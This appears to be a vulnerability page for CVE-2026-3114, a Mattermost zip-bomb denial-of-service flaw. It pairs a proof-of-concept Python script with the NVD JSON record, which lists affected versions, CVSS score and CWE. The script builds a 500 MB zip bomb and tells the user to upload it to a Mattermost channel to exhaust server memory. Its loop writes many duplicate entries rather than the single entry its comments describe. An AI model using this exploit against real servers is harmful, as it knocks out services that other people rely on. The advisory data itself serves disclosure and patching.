CVE-2026-3114

import zipfile import io # PoC for CVE-2026-3114: Mattermost Zip Bomb DoS # This script generates a zip file containing a highly compressed entry. # When uploaded to a vulnerable Mattermost instance, it will attempt to decompress # the massive content, exhausting server memory. def create_zip_bomb(filename, uncompressed_size_mb=100): # Create a buffer to hold the zip file in memory zip_buffer = io.BytesIO() try: with zipfile.ZipFile(zip_buffer, 'w', zipfile.ZIP_DEFLATED) as zf: # Create a file with repeating bytes that compresses very well # e.g., 100MB of null bytes compresses to a few KB print(f"Generating bomb payload: {uncompressed_size_mb}MB...") payload = b'\x00' * (1024 * 1024) # 1MB chunk # Write the chunk multiple times to the zip entry for _ in range(uncompressed_size_mb): zf.writestr("bomb_payload.txt", payload) # Write the buffer to a file with open(filename, 'wb') as f: f.write(zip_buffer.getvalue()) print(f"Successfully created '{filename}'.") print("Upload this file to a Mattermost channel to trigger the DoS.") except Exception as e: print(f"Error creating zip bomb: {e}") if __name__ == "__main__": # Adjust the size (in MB) as needed to target available memory create_zip_bomb("cve_2026_3114_poc.zip", uncompressed_size_mb=500)

{"cve": {"id": "CVE-2026-3114", "sourceIdentifier": "[email protected]", "published": "2026-03-26T17:16:42.480", "lastModified": "2026-03-30T19:40:45.843", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mattermost versions 11.4.x <= 11.4.0, 11.3.x <= 11.3.1, 11.2.x <= 11.2.3, 10.11.x <= 10.11.11 fail to validate decompressed archive entry sizes during file extraction which allows authenticated users with file upload permissions to cause a denial of service via crafted zip archives containing highly compressed entries (zip bombs) that exhaust server memory.. Mattermost Advisory ID: MMSA-2026-00598"}, {"lang": "es", "value": "Las versiones de Mattermost 11.4.x &lt;= 11.4.0, 11.3.x &lt;= 11.3.1, 11.2.x &lt;= 11.2.3, 10.11.x &lt;= 10.11.11 no validan los tamaños de las entradas de archivo descomprimidas durante la extracción de archivos, lo que permite a usuarios autenticados con permisos de carga de archivos causar una denegación de servicio mediante archivos zip manipulados que contienen entradas altamente comprimidas (bombas zip) que agotan la memoria del servidor. ID de aviso de Mattermost: MMSA-2026-00598"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-409"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.11.0", "versionEndExcluding": "10.11.12", "matchCriteriaId": "D144BD1D-F65C-498D-BC8A-F3D718F47F4B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.2.0", "versionEndExcluding": "11.2.4", "matchCriteriaId": "2E3E9B61-F003-45E4-9A04-8015A5CB8558"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.3.0", "versionEndExcluding": "11.3.2", "matchCriteriaId": "805ECFFC-82FD-4754-AF95-32167E1D41CB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:11.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "7B6A1FE2-D980-4755-A838-190A53A4D62B"}]}]}], "references": [{"url": "https://mattermost.com/security-updates", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}